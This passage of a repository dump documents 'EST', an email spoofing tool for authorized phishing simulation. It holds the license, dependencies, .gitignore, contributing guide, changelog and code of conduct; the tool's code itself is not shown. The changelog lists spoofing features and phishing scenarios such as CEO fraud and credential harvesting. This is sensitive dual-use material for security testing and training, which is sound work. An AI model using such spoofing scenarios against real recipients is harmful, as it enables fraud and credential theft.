├── LICENSE
├── requirements.txt
├── .gitignore
├── CONTRIBUTING.md
├── CHANGELOG.md
├── CODE_OF_CONDUCT.md
├── README.md
├── install.sh
└── est.py
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2025 Tech Sky - Security Research Team
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | # EST - Email Spoofing Tool Requirements
2 | # Compatible with Python 3.8+ including Python 3.13+
3 |
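4 | # Core DNS functionality for MX record resolution (lower bound only; pin an exact version and install with pip's --require-hashes when reproducible, verifiable installs are needed)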
5 | dnspython>=2.1.0
6 |
7 | # Essential Python packaging tools
8 | setuptools>=45.0
9 | wheel>=0.36.0
10 |
11 | # Optional: Enhanced functionality
12 | # Note: These are optional and will be installed if available
13 | # Most functionality works with just dnspython
14 |
15 | # For enhanced email parsing (optional)
16 | # email-validator>=1.3.0
17 |
18 | # For improved CLI experience (optional)
19 | # rich>=10.0.0
20 |
21 | # For YAML configuration support (optional)
22 | # PyYAML>=5.4.0
23 |
24 | # Installation Notes:
25 | # ==================
26 | #
27 | # For Python 3.13+ (Kali Linux, newer distributions):
28 | # - The installer will automatically create a virtual environment
29 | # - This avoids externally-managed-environment errors
30 | # - System packages (python3-dnspython) are preferred when available
31 | #
32 | # For older Python versions:
33 | # - Direct installation via pip should work normally
34 | # - Virtual environments are still recommended for isolation
35 | #
36 | # System package alternatives:
37 | # - Debian/Ubuntu/Kali: sudo apt install python3-dnspython
38 | # - Fedora: sudo dnf install python3-dns
39 | # - Arch: sudo pacman -S python-dnspython
40 | #
41 | # Manual installation fallback:
42 | # - pip3 install --user dnspython (user-local)
43 | # - pip3 install --user --break-system-packages dnspython (override; bypasses pip's externally-managed-environment guard, so prefer the virtual environment below)
44 | #
45 | # Virtual environment installation:
46 | # - python3 -m venv ~/.est-env
47 | # - source ~/.est-env/bin/activate
48 | # - pip install -r requirements.txt
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # EST - Email Spoofing Tool .gitignore
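2 | # This file keeps sensitive and unnecessary files from being committed by accident. It only affects untracked files: anything already tracked, or added with `git add -f`, is still committed and must be removed from the index (and rotated if it is a secret)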
3 |
4 | # Python
5 | __pycache__/
6 | *.py[cod]
7 | *$py.class
8 | *.so
9 | .Python
10 | build/
11 | develop-eggs/
12 | dist/
13 | downloads/
14 | eggs/
15 | .eggs/
16 | lib/
17 | lib64/
18 | parts/
19 | sdist/
20 | var/
21 | wheels/
22 | pip-wheel-metadata/
23 | share/python-wheels/
24 | *.egg-info/
25 | .installed.cfg
26 | *.egg
27 | MANIFEST
28 |
29 | # PyInstaller
30 | *.manifest
31 | *.spec
32 |
33 | # Installer logs
34 | pip-log.txt
35 | pip-delete-this-directory.txt
36 |
37 | # Unit test / coverage reports
38 | htmlcov/
39 | .tox/
40 | .nox/
41 | .coverage
42 | .coverage.*
43 | .cache
44 | nosetests.xml
45 | coverage.xml
46 | *.cover
47 | *.py,cover
48 | .hypothesis/
49 | .pytest_cache/
50 |
51 | # Virtual environments
52 | .env
53 | .venv
54 | env/
55 | venv/
56 | ENV/
57 | env.bak/
58 | venv.bak/
59 |
60 | # IDE files
61 | .vscode/
62 | .idea/
63 | *.swp
64 | *.swo
65 | *~
66 |
67 | # macOS
68 | .DS_Store
69 |
70 | # Windows
71 | Thumbs.db
72 | ehthumbs.db
73 | Desktop.ini
74 | $RECYCLE.BIN/
75 |
76 | # Linux
77 | *~
78 |
79 | # EST specific files
80 | # ==================
81 |
82 | # Configuration files with sensitive data
83 | config.json
84 | settings.json
85 | credentials.json
86 | secrets.json
87 |
88 | # Log files
89 | *.log
90 | logs/
91 | est_tests.log
92 | smtp_server.log
93 |
94 | # Test data
95 | test_emails/
96 | test_results/
97 | tmp_emails/
98 |
99 | # Reports with potentially sensitive information
100 | reports/*.json
101 | reports/*.html
102 | reports/*.pdf
103 | *.report
104 |
105 | # User configuration directory contents
106 | .est/config.json
107 | .est/logs/
108 | .est/reports/
109 | .est/temp/
110 |
111 | # Email test files
112 | *.eml
113 | *.msg
114 | test_*.txt
115 |
116 | # SMTP server temporary files
117 | smtp_temp/
118 | mail_queue/
119 |
120 | # SSL/TLS certificates (if any)
121 | *.pem
122 | *.key
123 | *.crt
124 | *.csr
125 | *.p12
126 | *.pfx
127 |
128 | # Database files (if any)
129 | *.db
130 | *.sqlite
131 | *.sqlite3
132 |
133 | # Backup files
134 | *.bak
135 | *.backup
136 | *.old
137 |
138 | # Temporary files
139 | *.tmp
140 | *.temp
141 | temp/
142 | tmp/
143 |
144 | # Archive files
145 | *.zip
146 | *.tar.gz
147 | *.rar
148 |
149 | # Documentation build files
150 | docs/_build/
151 | docs/build/
152 | site/
153 |
154 | # JetBrains IDEs
155 | .idea/
156 | *.iml
157 | *.ipr
158 | *.iws
159 |
160 | # Sublime Text
161 | *.sublime-project
162 | *.sublime-workspace
163 |
164 | # Vim
165 | *.swp
166 | *.swo
167 |
168 | # Emacs
169 | *~
170 | \#*\#
171 | /.emacs.desktop
172 | /.emacs.desktop.lock
173 | *.elc
174 | auto-save-list
175 | tramp
176 | .\#*
177 |
178 | # Security sensitive files
179 | # =========================
180 | # Never commit these types of files for a security tool
181 |
182 | # API keys and tokens
183 | .env.local
184 | .env.production
185 | api_keys.txt
186 | tokens.txt
187 |
188 | # User credentials
189 | usernames.txt
190 | passwords.txt
191 | creds.txt
192 |
193 | # Real email addresses
194 | real_emails.txt
195 | target_emails.txt
196 | email_lists.txt
197 |
198 | # Production configuration
199 | production.json
200 | prod_config.json
201 |
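202 | # SSH keys (only the default RSA key names are listed; other key types such as id_ed25519 or id_ecdsa are not matched)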
203 | id_rsa
204 | id_rsa.pub
205 | *.pem
206 |
207 | # Local environment variables
208 | .env.*
209 |
210 | # OS generated files
211 | .DS_Store?
212 | Icon?
213 | .Spotlight-V100
214 | .Trashes
215 | ._*
216 |
217 | # Windows image file caches
218 | Thumbs.db
219 | ehthumbs.db
220 |
221 | # Folder config file
222 | Desktop.ini
223 |
224 | # Recycle Bin used on file shares
225 | $RECYCLE.BIN/
226 |
227 | # Application specific
228 | node_modules/
229 | .npm
230 | .sass-cache/
231 |
232 | # Custom additions for EST
233 | # ========================
234 |
235 | # Installation artifacts
236 | install.log
237 | installation_*.log
238 |
239 | # Test results
240 | test_output/
241 | test_logs/
242 | junit.xml
243 |
244 | # Performance test results
245 | performance_*.json
246 | benchmark_*.txt
247 |
248 | # Documentation builds
249 | _site/
250 | .jekyll-cache/
251 | .jekyll-metadata
252 |
253 | # Local development
254 | local_*
255 | dev_*
256 | debug_*
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing to EST (Email Spoofing Tool)
2 |
3 | Thank you for your interest in contributing to EST! This document provides guidelines and information for contributors.
4 |
5 | ## 🚨 Legal Notice
6 |
7 | **IMPORTANT**: EST is designed for authorized security testing, penetration testing, and educational purposes only. By contributing to this project, you acknowledge that:
8 |
9 | - You will only use EST for legitimate, authorized security testing
10 | - You understand the legal implications of email spoofing tools
11 | - You agree to obtain explicit written permission before testing any systems you do not own
12 | - Unauthorized use may violate local, state, and federal laws
13 |
14 | ## 🎯 Ways to Contribute
15 |
16 | ### 1. Bug Reports
17 | - Use GitHub Issues to report bugs
18 | - Include detailed steps to reproduce
19 | - Provide system information (OS, Python version)
20 | - Include relevant log files or error messages
21 |
22 | ### 2. Feature Requests
23 | - Propose new security testing scenarios
24 | - Suggest improvements to existing functionality
25 | - Request documentation enhancements
26 |
27 | ### 3. Code Contributions
28 | - Fix bugs or implement new features
29 | - Improve code quality and performance
30 | - Add unit tests for new functionality
31 | - Update documentation
32 |
33 | ### 4. Documentation
34 | - Improve README or documentation
35 | - Add examples and tutorials
36 | - Fix typos or clarify instructions
37 | - Translate documentation
38 |
39 | ## 🛠️ Development Setup
40 |
41 | ### Prerequisites
42 | - Python 3.8 or higher
43 | - Git
44 | - pip3
45 |
46 | ### Getting Started
47 |
48 | 1. **Fork the repository**
49 | ```bash
50 | # Click "Fork" on GitHub, then clone your fork (replace techsky-eh in the URL below with your GitHub username)
51 | git clone https://github.com/techsky-eh/EST.git
52 | cd EST
53 | ```
54 |
55 | 2. **Set up development environment**
56 | ```bash
57 | # Create virtual environment
58 | python3 -m venv venv
59 | source venv/bin/activate # Linux/macOS
60 | # venv\Scripts\activate # Windows
61 |
62 | # Install dependencies
63 | pip install -r requirements.txt
64 |
65 | # Install in development mode (requires a setup.py or pyproject.toml in the repository root)
66 | pip install -e .
67 | ```
68 |
69 | 3. **Test the installation**
70 | ```bash
71 | python3 est.py --help
72 | ```
73 |
74 | ## 📋 Code Guidelines
75 |
76 | ### Python Style
77 | - Follow PEP 8 style guidelines
78 | - Use meaningful variable and function names
79 | - Add docstrings to all functions and classes
80 | - Keep lines under 88 characters when possible
81 |
82 | ### Security Considerations
83 | - Never commit real email addresses or credentials
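84 | - Use reserved placeholder domains for examples (example.com, example.org, or names under .test / .example), never a domain that someone else may own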
85 | - Ensure all test data is clearly marked as test data
86 | - Review code for potential security vulnerabilities
87 |
88 | ### Testing
89 | - Add unit tests for new functionality
90 | - Test on multiple Python versions (3.8+)
91 | - Verify functionality on different operating systems
92 | - Test installation procedures
93 |
94 | ## 🔄 Pull Request Process
95 |
96 | ### Before Submitting
97 | 1. **Check existing issues** - Make sure your contribution isn't already being worked on
98 | 2. **Open an issue** - For significant changes, discuss your approach first
99 | 3. **Create a branch** - Use descriptive branch names like `fix-smtp-timeout` or `add-oauth-support`
100 |
101 | ### Submitting Your PR
102 | 1. **Clear description** - Explain what changes you made and why
103 | 2. **Link issues** - Reference related issues using `Fixes #123`
104 | 3. **Update documentation** - Include relevant documentation updates
105 | 4. **Add tests** - Include tests for new functionality
106 |
107 | ### PR Template
108 | ```
109 | ## Description
110 | Brief description of changes
111 |
112 | ## Type of Change
113 | - [ ] Bug fix (non-breaking change that fixes an issue)
114 | - [ ] New feature (non-breaking change that adds functionality)
115 | - [ ] Breaking change (fix or feature that changes existing functionality)
116 | - [ ] Documentation update
117 |
118 | ## Testing
119 | - [ ] I have tested these changes locally
120 | - [ ] I have added tests that prove my fix is effective
121 | - [ ] I have updated documentation as needed
122 |
123 | ## Security Impact
124 | - [ ] These changes do not introduce security vulnerabilities
125 | - [ ] I have reviewed the code for potential security issues
126 | - [ ] Documentation includes appropriate security warnings
127 |
128 | ## Checklist
129 | - [ ] My code follows the project's style guidelines
130 | - [ ] I have performed a self-review of my code
131 | - [ ] I have commented my code, particularly in hard-to-understand areas
132 | - [ ] My changes generate no new warnings
133 | ```
134 |
135 | ## 🧪 Testing Guidelines
136 |
137 | ### Running Tests
138 | ```bash
139 | # Run all tests
140 | python3 -m pytest
141 |
142 | # Run specific test file
143 | python3 -m pytest tests/test_smtp_server.py
144 |
145 | # Run with coverage
146 | python3 -m pytest --cov=est
147 | ```
148 |
149 | ### Test Categories
150 | - **Unit Tests**: Test individual functions and classes
151 | - **Integration Tests**: Test component interactions
152 | - **Security Tests**: Verify security features work correctly
153 | - **Installation Tests**: Test installation procedures
154 |
155 | ## 📚 Documentation Standards
156 |
157 | ### Code Documentation
158 | - Use Google-style docstrings
159 | - Include parameter types and return values
160 | - Provide usage examples where helpful
161 |
162 | ### README Updates
163 | - Keep installation instructions current
164 | - Update feature lists for new functionality
165 | - Include relevant security warnings
166 |
167 | ## 🐛 Bug Report Template
168 |
169 | When reporting bugs, please include:
170 |
171 | ```
172 | **EST Version**: [e.g., 2.0.0]
173 | **Python Version**: [e.g., 3.9.7]
174 | **Operating System**: [e.g., Ubuntu 20.04]
175 |
176 | **Description**
177 | A clear description of the bug
178 |
179 | **Steps to Reproduce**
180 | 1. Run command: `est server --port 2525`
181 | 2. Execute: `est test 1 test@example.com`
182 | 3. See error...
183 |
184 | **Expected Behavior**
185 | What you expected to happen
186 |
187 | **Actual Behavior**
188 | What actually happened
189 |
190 | **Error Messages**
191 | ```
192 | Include any error messages or logs
193 | ```
194 |
195 | **Additional Context**
196 | Any other context about the problem
197 | ```
198 |
199 | ## 🚀 Feature Request Template
200 |
201 | ```
202 | **Feature Description**
203 | A clear description of the feature you'd like to see
204 |
205 | **Use Case**
206 | Explain how this feature would be used
207 |
208 | **Current Workaround**
209 | How do you currently achieve this (if possible)?
210 |
211 | **Additional Context**
212 | Any other context, mockups, or examples
213 | ```
214 |
215 | ## 📋 Security Scenario Contributions
216 |
217 | ### Adding New Attack Scenarios
218 | When contributing new email spoofing scenarios:
219 |
220 | 1. **Realistic**: Based on actual attack patterns
221 | 2. **Educational**: Include clear descriptions of the attack
222 | 3. **Ethical**: Include appropriate warnings and disclaimers
223 | 4. **Categorized**: Fit into existing categories or propose new ones
224 | 5. **Severity Rated**: Use Critical/High/Medium/Low severity levels
225 |
226 | ### Scenario Template
227 | ```python
228 | {
229 | "name": "Brief Descriptive Name",
230 | "category": "Attack Category",
231 | "from_email": "spoofed@example.com",
232 | "from_name": "Display Name",
233 | "subject": "Email Subject Line",
234 | "body": "Email body with clear attack simulation...",
235 | "description": "Educational description of the attack type",
236 | "severity": "Critical/High/Medium/Low"
237 | }
238 | ```
239 |
240 | ## 📞 Getting Help
241 |
242 | ### Communication Channels
243 | - **GitHub Issues**: Bug reports and feature requests
244 | - **GitHub Discussions**: Questions and general discussion
245 | - **Security Issues**: Email contact@techskyhub.com (private disclosure)
246 |
247 | ### Code Review Process
248 | 1. All contributions require review by project maintainers
249 | 2. Reviews focus on functionality, security, and code quality
250 | 3. Address review feedback promptly
251 | 4. Maintainers will merge approved PRs
252 |
253 | ## 🏆 Recognition
254 |
255 | Contributors will be:
256 | - Added to the Contributors section in README.md
257 | - Mentioned in release notes for significant contributions
258 | - Given appropriate credit in documentation
259 |
260 | ## 📋 Contributor License Agreement
261 |
262 | By contributing to EST, you agree that:
263 | - Your contributions will be licensed under the same license as the project (MIT)
264 | - You have the right to submit the contribution
265 | - You understand this is an open source project
266 |
267 | ## ❓ Questions?
268 |
269 | If you have questions about contributing:
270 | 1. Check existing GitHub Issues and Discussions
271 | 2. Read through this CONTRIBUTING.md file
272 | 3. Open a new GitHub Discussion for general questions
273 | 4. Open a GitHub Issue for specific bugs or feature requests
274 |
275 | Thank you for helping make EST a better security testing tool! 🛡️
--------------------------------------------------------------------------------
/CHANGELOG.md:
--------------------------------------------------------------------------------
1 | # Changelog
2 |
3 | All notable changes to EST (Email Spoofing Tool) will be documented in this file.
4 |
5 | The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
6 | and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
7 |
8 | ## [Unreleased]
9 |
10 | ### Added
11 | - Planned: OAuth2 authentication support for modern mail servers
12 | - Planned: Advanced template system for custom scenarios
13 | - Planned: Web-based dashboard for test management
14 | - Planned: Integration with popular penetration testing frameworks
15 |
16 | ### Changed
17 | - Planned: Improved error handling and user feedback
18 | - Planned: Enhanced logging with structured output
19 |
20 | ## [2.0.0] - 2025-06-12
21 |
22 | ### Added
23 | - **Complete rewrite** of EST for professional security testing
24 | - **Multi-threaded SMTP server** with real-time email relay capabilities
25 | - **5 realistic attack scenarios** covering major threat vectors:
26 | - CEO Fraud / Business Email Compromise
27 | - IT Helpdesk credential harvesting
28 | - PayPal phishing simulation
29 | - Microsoft 365 license scams
30 | - Banking institution impersonation
31 | - **Custom spoofing tests** with full parameter control
32 | - **Professional installation script** supporting multiple Linux distributions
33 | - **Comprehensive audit logging** with JSON output format
34 | - **Assessment report generation** with security recommendations
35 | - **Cross-platform compatibility** (Linux, macOS, Windows)
36 | - **Desktop integration** with application launchers
37 | - **Bash completion** for command-line efficiency
38 | - **Automatic MX record resolution** for real email delivery
39 | - **Professional CLI interface** with colored output and progress indicators
40 | - **User configuration management** with ~/.est/ directory structure
41 | - **Documentation suite** including quickstart and troubleshooting guides
42 |
43 | ### Security Features
44 | - **Legal disclaimers** prominently displayed in all outputs
45 | - **Test identification** in all generated emails
46 | - **Secure configuration handling** with proper file permissions
47 | - **Input validation** to prevent injection attacks
48 | - **Ethical use reminders** throughout the application
49 |
50 | ### Technical Improvements
51 | - **Modern Python architecture** using dataclasses and type hints
52 | - **Robust error handling** with graceful degradation
53 | - **Signal handling** for clean server shutdown
54 | - **Connection pooling** for improved performance
55 | - **DNS fallback mechanisms** for reliable email delivery
56 | - **Professional logging** with multiple output levels
57 |
58 | ### Documentation
59 | - **Comprehensive README** with installation and usage instructions
60 | - **Professional installation guide** with system requirements
61 | - **Security guidelines** and legal considerations
62 | - **Contributing guidelines** for open source development
63 | - **Code of conduct** establishing community standards
64 | - **API documentation** for developers
65 |
66 | ### Breaking Changes
67 | - **Complete API redesign** - not compatible with v1.x
68 | - **New command structure** - old commands will not work
69 | - **Configuration format changes** - requires reconfiguration
70 | - **Python 3.8+ requirement** - dropped support for older versions
71 |
72 | ### Migration from v1.x
73 | - Run the new installation script: `./install.sh`
74 | - Review the new configuration format in `~/.est/config.json`
75 | - Update any scripts to use the new command syntax
76 | - See QUICKSTART.md for updated usage examples
77 |
78 | ## [1.3.0] - 2024-03-15
79 |
80 | ### Added
81 | - Basic SMTP relay functionality
82 | - Simple configuration file support
83 | - Command-line argument parsing
84 |
85 | ### Fixed
86 | - Email encoding issues with special characters
87 | - Connection timeout problems
88 |
89 | ### Deprecated
90 | - Legacy configuration format (removed in v2.0.0)
91 |
92 | ## [1.2.1] - 2024-02-20
93 |
94 | ### Fixed
95 | - Critical security vulnerability in email header handling
96 | - Memory leak in SMTP server
97 |
98 | ### Security
99 | - Fixed potential injection vulnerability in email headers
100 | - Added input sanitization for user-provided data
101 |
102 | ## [1.2.0] - 2024-01-10
103 |
104 | ### Added
105 | - Windows support
106 | - Basic logging functionality
107 | - Email template system
108 |
109 | ### Changed
110 | - Improved error messages
111 | - Updated dependencies
112 |
113 | ## [1.1.0] - 2023-11-05
114 |
115 | ### Added
116 | - macOS support
117 | - Basic email scenarios
118 | - Simple installation script
119 |
120 | ### Fixed
121 | - Port binding issues on some systems
122 | - DNS resolution problems
123 |
124 | ## [1.0.0] - 2023-08-20
125 |
126 | ### Added
127 | - Initial release of EST
128 | - Basic email spoofing capabilities
129 | - Simple SMTP server
130 | - Command-line interface
131 | - MIT license
132 |
133 | ### Security Considerations
134 | - Added legal disclaimers
135 | - Implemented basic usage warnings
136 |
137 | ---
138 |
139 | ## Version Support
140 |
141 | - **v2.x**: Current stable release with active development
142 | - **v1.x**: Legacy version, security fixes only until 2025-12-31
143 | - **v0.x**: No longer supported
144 |
145 | ## Upgrade Guidelines
146 |
147 | ### From v1.x to v2.x
148 | 1. **Backup your data**: Export any custom scenarios or configurations
149 | 2. **Uninstall v1.x**: Remove old installation completely
150 | 3. **Install v2.0**: Use the new installation script
151 | 4. **Migrate configuration**: Manually recreate any custom settings
152 | 5. **Update scripts**: Rewrite any automation to use new API
153 |
154 | ### Security Notes
155 | - Always review the security implications when upgrading
156 | - Test thoroughly in a safe environment before production use
157 | - Review the updated legal disclaimers and usage guidelines
158 |
159 | ## Development Milestones
160 |
161 | ### Completed
162 | - ✅ Professional CLI interface
163 | - ✅ Multi-threaded SMTP server
164 | - ✅ Comprehensive logging system
165 | - ✅ Assessment reporting
166 | - ✅ Cross-platform support
167 | - ✅ Professional documentation
168 |
169 | ### In Progress
170 | - 🔄 Web dashboard development
171 | - 🔄 Advanced template engine
172 | - 🔄 Integration testing suite
173 |
174 | ### Planned
175 | - 📋 OAuth2 authentication support
176 | - 📋 Cloud deployment options
177 | - 📋 Advanced analytics dashboard
178 | - 📋 Integration with security frameworks
179 | - 📋 Mobile app for remote testing
180 |
181 | ## Community Contributions
182 |
183 | Special thanks to our contributors:
184 |
185 | ### v2.0.0 Contributors
186 | - **Tech Sky - Ethical Hacking - Security Research Team** - Complete rewrite and professional enhancement
187 | - Community feedback from security professionals worldwide
188 | - Open source contributors and maintainers
189 |
190 | ### Historical Contributors
191 | - **Tech Sky Development Team** - Initial concept and v1.x development
192 | - Beta testers and security researchers - Critical feedback and bug reports
193 | - Cybersecurity community - Scenario development and testing
194 | - Educational institutions - Research and validation support
195 |
196 | ## Support Information
197 |
198 | - **Bug Reports**: Use GitHub Issues
199 | - **Feature Requests**: GitHub Discussions
200 | - **Security Issues**: Email contact@techskyhub.com
201 | - **General Support**: Email contact@techskyhub.com
202 | - **Technical Questions**: Email contact@techskyhub.com
203 | - **Documentation**: See docs/ directory
204 | - **Community**: GitHub Discussions
205 | - **Website**: https://techskyhub.com
206 |
207 | ## Acknowledgments
208 |
209 | ### Special Recognition
210 | - **Tech Sky Team** for dedication to ethical security research
211 | - **Cybersecurity educators** who incorporate EST into training programs
212 | - **Penetration testers** who provide real-world feedback
213 | - **Open source community** for continuous improvement suggestions
214 |
215 | ### Research Partners
216 | - Educational institutions supporting cybersecurity research
217 | - Security conferences and workshops featuring EST demonstrations
218 | - Ethical hacking communities promoting responsible disclosure
219 |
220 | ## Legal & Compliance
221 |
222 | EST is developed and maintained by **Tech Sky - Ethical Hacking - Security Research Team** with a commitment to:
223 |
224 | - **Ethical security testing** practices and guidelines
225 | - **Legal compliance** with applicable cybersecurity regulations
226 | - **Responsible disclosure** of security vulnerabilities
227 | - **Educational advancement** in cybersecurity awareness
228 | - **Professional standards** in penetration testing tools
229 |
230 | ## Contact Information
231 |
232 | **Tech Sky - Ethical Hacking - Security Research Team**
233 |
234 | - **Primary Contact**: contact@techskyhub.com
235 | - **Security Reports**: contact@techskyhub.com
236 | - **Partnership Inquiries**: contact@techskyhub.com
237 | - **Educational Licensing**: contact@techskyhub.com
238 |
239 | For detailed information about any release, see the corresponding GitHub release notes and commit history.
240 |
241 | ---
242 |
243 | *EST v2.0+ - Professional Email Security Assessment Framework*
244 | *Developed with ❤️ by Tech Sky - Ethical Hacking - Security Research Team*
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Code of Conduct
2 |
3 | ## Our Pledge
4 |
5 | We as members, contributors, and leaders pledge to make participation in our
6 | community a harassment-free experience for everyone, regardless of age, body
7 | size, visible or invisible disability, ethnicity, sex characteristics, gender
8 | identity and expression, level of experience, education, socio-economic status,
9 | nationality, personal appearance, race, religion, or sexual identity
10 | and orientation.
11 |
12 | We pledge to act and interact in ways that contribute to an open, welcoming,
13 | diverse, inclusive, and healthy community.
14 |
15 | ## Our Standards
16 |
17 | Examples of behavior that contributes to a positive environment for our
18 | community include:
19 |
20 | * Demonstrating empathy and kindness toward other people
21 | * Being respectful of differing opinions, viewpoints, and experiences
22 | * Giving and gracefully accepting constructive feedback
23 | * Accepting responsibility and apologizing to those affected by our mistakes,
24 | and learning from the experience
25 | * Focusing on what is best not just for us as individuals, but for the
26 | overall community
27 | * Using EST only for authorized security testing and educational purposes
28 | * Respecting the legal and ethical boundaries of security testing
29 | * Providing clear warnings about the proper use of security tools
30 |
31 | Examples of unacceptable behavior include:
32 |
33 | * The use of sexualized language or imagery, and sexual attention or
34 | advances of any kind
35 | * Trolling, insulting or derogatory comments, and personal or political attacks
36 | * Public or private harassment
37 | * Publishing others' private information, such as a physical or email
38 | address, without their explicit permission
39 | * Using EST for unauthorized testing or malicious purposes
40 | * Promoting illegal activities or encouraging misuse of security tools
41 | * Other conduct which could reasonably be considered inappropriate in a
42 | professional setting
43 |
44 | ## Security-Specific Standards
45 |
46 | Given that EST is a security testing tool, we have additional standards:
47 |
48 | ### Ethical Use
49 | * **Authorization Required**: Always obtain explicit written permission before testing systems you do not own
50 | * **Educational Focus**: Use EST for legitimate security research, education, and authorized testing only
51 | * **Responsible Disclosure**: If you discover vulnerabilities using EST, follow responsible disclosure practices
52 | * **Legal Compliance**: Ensure your use of EST complies with local, state, and federal laws
53 |
54 | ### Community Responsibility
55 | * **Clear Warnings**: Always include appropriate disclaimers when sharing EST usage examples
56 | * **No Malicious Code**: Do not contribute malicious payloads or encourage harmful use
57 | * **Privacy Respect**: Do not share real email addresses, credentials, or sensitive information
58 | * **Professional Conduct**: Maintain professional standards when discussing security topics
59 |
60 | ## Enforcement Responsibilities
61 |
62 | Community leaders are responsible for clarifying and enforcing our standards of
63 | acceptable behavior and will take appropriate and fair corrective action in
64 | response to any behavior that they deem inappropriate, threatening, offensive,
65 | or harmful.
66 |
67 | Community leaders have the right and responsibility to remove, edit, or reject
68 | comments, commits, code, wiki edits, issues, and other contributions that are
69 | not aligned to this Code of Conduct, and will communicate reasons for moderation
70 | decisions when appropriate.
71 |
72 | ## Scope
73 |
74 | This Code of Conduct applies within all community spaces, and also applies when
75 | an individual is officially representing the community in public spaces.
76 | Examples of representing our community include using an official e-mail address,
77 | posting via an official social media account, or acting as an appointed
78 | representative at an online or offline event.
79 |
80 | This Code of Conduct specifically applies to:
81 | * GitHub repository interactions (issues, pull requests, discussions)
82 | * Code contributions and reviews
83 | * Documentation and wiki contributions
84 | * Community discussions and forums
85 | * Public presentations or demonstrations of EST
86 | * Any use of EST that reflects on the community
87 |
88 | ## Reporting Guidelines
89 |
90 | ### General Issues
91 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
92 | reported to the community leaders responsible for enforcement at
93 | [contact@techskyhub.com](mailto:contact@techskyhub.com).
94 |
95 | ### Security-Related Issues
96 | If you observe misuse of EST or security-related violations:
97 | * **Immediate Threats**: Contact law enforcement if there's immediate danger
98 | * **Tool Misuse**: Report unauthorized use to [contact@techskyhub.com](mailto:contact@techskyhub.com)
99 | * **Code Vulnerabilities**: Report security vulnerabilities in EST itself privately to [contact@techskyhub.com](mailto:contact@techskyhub.com) rather than in a public issue
100 |
101 | All complaints will be reviewed and investigated promptly and fairly.
102 |
103 | All community leaders are obligated to respect the privacy and security of the
104 | reporter of any incident.
105 |
106 | ## Enforcement Guidelines
107 |
108 | Community leaders will follow these Community Impact Guidelines in determining
109 | the consequences for any action they deem in violation of this Code of Conduct:
110 |
111 | ### 1. Correction
112 |
113 | **Community Impact**: Use of inappropriate language or other behavior deemed
114 | unprofessional or unwelcome in the community.
115 |
116 | **Consequence**: A private, written warning from community leaders, providing
117 | clarity around the nature of the violation and an explanation of why the
118 | behavior was inappropriate. A public apology may be requested.
119 |
120 | ### 2. Warning
121 |
122 | **Community Impact**: A violation through a single incident or series
123 | of actions.
124 |
125 | **Consequence**: A warning with consequences for continued behavior. No
126 | interaction with the people involved, including unsolicited interaction with
127 | those enforcing the Code of Conduct, for a specified period of time. This
128 | includes avoiding interactions in community spaces as well as external channels
129 | like social media. Violating these terms may lead to a temporary or
130 | permanent ban.
131 |
132 | ### 3. Temporary Ban
133 |
134 | **Community Impact**: A serious violation of community standards, including
135 | sustained inappropriate behavior.
136 |
137 | **Consequence**: A temporary ban from any sort of interaction or public
138 | communication with the community for a specified period of time. No public or
139 | private interaction with the people involved, including unsolicited interaction
140 | with those enforcing the Code of Conduct, is allowed during this period.
141 | Violating these terms may lead to a permanent ban.
142 |
143 | ### 4. Permanent Ban
144 |
145 | **Community Impact**: Demonstrating a pattern of violation of community
146 | standards, including sustained inappropriate behavior, harassment of an
147 | individual, or aggression toward or disparagement of classes of individuals.
148 |
149 | **Consequence**: A permanent ban from any sort of public interaction within
150 | the community.
151 |
152 | ## Security Tool Specific Enforcement
153 |
154 | ### Misuse of EST
155 | If EST is used for unauthorized or malicious purposes:
156 |
157 | 1. **Documentation**: The incident will be documented and reported to appropriate authorities if necessary
158 | 2. **Community Ban**: The user will be permanently banned from the community
159 | 3. **Legal Action**: Legal action may be pursued if laws have been violated
160 | 4. **Public Warning**: A public warning may be issued to protect others
161 |
162 | ### Contributing Malicious Code
163 | Contributors who attempt to introduce malicious functionality:
164 |
165 | 1. **Immediate Removal**: Malicious code will be immediately removed
166 | 2. **Account Suspension**: The contributor's access will be suspended pending investigation
167 | 3. **Permanent Ban**: Confirmed malicious contributions result in permanent community ban
168 | 4. **Security Advisory**: A security advisory may be published if necessary
169 |
170 | ## Attribution
171 |
172 | This Code of Conduct is adapted from the [Contributor Covenant][homepage],
173 | version 2.0, available at
174 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.
175 |
176 | Community Impact Guidelines were inspired by [Mozilla's code of conduct
177 | enforcement ladder](https://github.com/mozilla/diversity).
178 |
179 | [homepage]: https://www.contributor-covenant.org
180 |
181 | For answers to common questions about this code of conduct, see the FAQ at
182 | https://www.contributor-covenant.org/faq. Translations are available at
183 | https://www.contributor-covenant.org/translations.
184 |
185 | ## Legal Disclaimer
186 |
187 | This Code of Conduct does not supersede any applicable laws. EST users and contributors
188 | are responsible for ensuring their activities comply with all applicable laws and
189 | regulations. The EST project maintainers are not responsible for how individuals
